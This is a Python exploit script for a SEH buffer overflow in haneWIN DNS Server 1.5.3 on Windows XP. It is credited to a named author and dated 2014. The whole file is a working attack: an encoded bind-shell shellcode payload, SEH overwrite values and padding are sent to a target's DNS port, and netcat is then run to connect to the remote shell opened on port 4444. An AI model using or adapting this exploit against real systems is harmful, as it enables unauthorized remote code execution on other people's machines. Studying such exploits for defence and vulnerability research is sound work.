#!/usr/bin/python
# Exploit Title: haneWIN DNS Server (SEH)
# Author: Dario Estrada (dash) https://intrusionlabs.org
# Date: 2014-01-29
# Version: haneWIN DNS Server 1.5.3
# Vendor Homepage: http://www.hanewin.net/
# Vulnerable app link:http://www.hanewin.net/dns-e.htm
# Tested on: Windows XP SP3
# Thanks to God, to my family and all my friends for always being there
#
# Description:
# A SEH overflow occurs when large amount of data is sent to the server
#
import
socket, sys, os, time
usage
=
"\n Usage: "
+
sys.argv[
0
]
+
" <host> \n"
if
len
(sys.argv) <
2
:
print
usage
sys.exit(
0
)
host
=
sys.argv[
1
]
shellcode
=
(
#msfpayload windows/shell_bind_tcp R | msfencode -t c -b '\x00\xff\x0a\x0d'
"\xb8\xdf\x64\x04\x29\xd9\xc7\xd9\x74\x24\xf4\x5d\x29\xc9\xb1"
"\x56\x31\x45\x13\x83\xed\xfc\x03\x45\xd0\x86\xf1\xd5\x06\xcf"
"\xfa\x25\xd6\xb0\x73\xc0\xe7\xe2\xe0\x80\x55\x33\x62\xc4\x55"
"\xb8\x26\xfd\xee\xcc\xee\xf2\x47\x7a\xc9\x3d\x58\x4a\xd5\x92"
"\x9a\xcc\xa9\xe8\xce\x2e\x93\x22\x03\x2e\xd4\x5f\xeb\x62\x8d"
"\x14\x59\x93\xba\x69\x61\x92\x6c\xe6\xd9\xec\x09\x39\xad\x46"
"\x13\x6a\x1d\xdc\x5b\x92\x16\xba\x7b\xa3\xfb\xd8\x40\xea\x70"
"\x2a\x32\xed\x50\x62\xbb\xdf\x9c\x29\x82\xef\x11\x33\xc2\xc8"
"\xc9\x46\x38\x2b\x74\x51\xfb\x51\xa2\xd4\x1e\xf1\x21\x4e\xfb"
"\x03\xe6\x09\x88\x08\x43\x5d\xd6\x0c\x52\xb2\x6c\x28\xdf\x35"
"\xa3\xb8\x9b\x11\x67\xe0\x78\x3b\x3e\x4c\x2f\x44\x20\x28\x90"
"\xe0\x2a\xdb\xc5\x93\x70\xb4\x2a\xae\x8a\x44\x24\xb9\xf9\x76"
"\xeb\x11\x96\x3a\x64\xbc\x61\x3c\x5f\x78\xfd\xc3\x5f\x79\xd7"
"\x07\x0b\x29\x4f\xa1\x33\xa2\x8f\x4e\xe6\x65\xc0\xe0\x58\xc6"
"\xb0\x40\x08\xae\xda\x4e\x77\xce\xe4\x84\x0e\xc8\x2a\xfc\x43"
"\xbf\x4e\x02\x72\x63\xc6\xe4\x1e\x8b\x8e\xbf\xb6\x69\xf5\x77"
"\x21\x91\xdf\x2b\xfa\x05\x57\x22\x3c\x29\x68\x60\x6f\x86\xc0"
"\xe3\xfb\xc4\xd4\x12\xfc\xc0\x7c\x5c\xc5\x83\xf7\x30\x84\x32"
"\x07\x19\x7e\xd6\x9a\xc6\x7e\x91\x86\x50\x29\xf6\x79\xa9\xbf"
"\xea\x20\x03\xdd\xf6\xb5\x6c\x65\x2d\x06\x72\x64\xa0\x32\x50"
"\x76\x7c\xba\xdc\x22\xd0\xed\x8a\x9c\x96\x47\x7d\x76\x41\x3b"
"\xd7\x1e\x14\x77\xe8\x58\x19\x52\x9e\x84\xa8\x0b\xe7\xbb\x05"
"\xdc\xef\xc4\x7b\x7c\x0f\x1f\x38\x8c\x5a\x3d\x69\x05\x03\xd4"
"\x2b\x48\xb4\x03\x6f\x75\x37\xa1\x10\x82\x27\xc0\x15\xce\xef"
"\x39\x64\x5f\x9a\x3d\xdb\x60\x8f"
)
nSEH
=
'\xeb\x06\x90\x90'
SEH
=
'\xd1\x07\xfc\x7f'
opcode
=
"\xe9\xdf\xf6\xff\xff"
junk
=
'A'
*
(
2324
-
len
(shellcode))
padding
=
'A'
*
600
buff
=
shellcode
+
junk
+
nSEH
+
SEH
+
opcode
+
padding
print
"[+] Connecting to %s:53"
%
(host)
try
:
s
=
socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host,
53
))
aix
=
shellcode
+
'A'
*
(
2324
-
len
(shellcode))
print
"[*] Sending payload.."
+
" shellcode: "
+
str
(
len
(shellcode))
s.send(buff)
print
"[*] Exploit Sent Successfully!"
s.close()
print
"[+] Waiting for 5 sec before spawning shell to "
+
host
+
":4444\r"
time.sleep(
5
)
os.system (
"nc -n "
+
host
+
" 4444"
)
except
:
print
"[!] Could not connect to "
+
host
+
":53\r"
sys.exit(
0
)